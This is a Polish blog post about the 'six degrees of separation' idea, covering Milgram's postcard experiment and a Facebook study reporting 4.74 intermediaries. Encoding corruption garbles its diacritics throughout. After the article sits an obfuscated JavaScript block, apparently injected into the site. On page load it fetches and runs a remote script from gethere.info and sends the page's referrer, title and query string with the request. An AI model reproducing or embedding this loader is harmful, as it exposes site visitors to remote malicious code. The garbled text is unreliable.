SzeA�A� uA�ciskA?w dA�oni

opublikowane w Najnowsze Wpisy, Psychologia | 0

Czy czA�sto zdarza wam siA� mA?wiA�, A?e A�wiat jest maleA�ki? CaA�kiem moA?liwe, A?e tak. Naukowy przekonujA� bowiem, A?e kaA?dy z nas ma dostA�p do innej osoby na A�wiecie przez jedynie 6 uA�ciskA?w dA�oni.

O co w tym chodzi? JeA�li jakaA� osoba zna innA� bezpoA�rednio, to jest oddalona od tej osoby o jeden stopieA�. JeA�li jakaA� osoba jest w relacji z innA� za poA�rednictwem kogoA� znanego bezpoA�rednio to jest oddalona od tej osoby o dwa stopnie i tak dalej. IloA�A� poA�rednikA?w miA�dzy dwiema osobami w caA�ej populacji ludzi na Ziemi nie przekracza szeA�ciu stopni oddalenia.TeoriA� tA� wysnuA� Stanley Miligram, ktA?ry w 1967 roku poprosiA� 296 ochotnikA?w, aby wysA�ali pocztA?wkA� do konkretnej osoby w Bostonie, a jeA�li jej nie znajA�, aby wysA�aA�y tA� wiadomoA�A� do osoby, ktA?ra ich zdaniem moA?e znaA� adresata lub mieA� z nim kontakt. OkazaA�o siA�, A?e wiA�kszoA�A� listA?w Milgrama dotarA�a do adresata po A�rednio szeA�ciokrotnym przekazaniu kolejnym osobom.

OczywiA�cie dzisiaj, dziA�ki internetowi i sieciom spoA�ecznoA�ciowym moA?na dotrzeA� do kaA?dego jeszcze szybciej- poprzez 2 lub 3 stopnie oddalenia. Naukowcy z Universita degli Studi di Milano, ktA?rzy przeprowadzili podobny eksperyment na Facebooku stwierdzili, A?e A�A�rednia liczba znajomych dzielA�cych dwie dowolne osoby na A�wiecie wynosi nie 6, a 4,74.A�Naukowcy przebadali ogromnA� grupA�, bo aA? 721 milionA?w uA?ytkownikA?w Facebooka, a wiA�c ponad dziesiA�A� procent caA�ej populacji naszej planety. Badanie trwaA�o miesiA�c. Komputery analizowaA�y ogromne iloA�ci przykA�adowych poA�A�czeA� pomiA�dzy uA?ytkownikami Facebooka. OkazaA�o siA�, A?e A�rednia liczba poA�rednikA?w pomiA�dzy dwiema losowo wybranymi osobami wynosi 4,74.A�Czy to nie fascynujA�ce, A?e aby dotrzeA� do nawet najbardziej oddalonego od nas czA�owieka na Ziemi, wystarczy tak niewielka sieA� poA�A�czeA�?


 var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}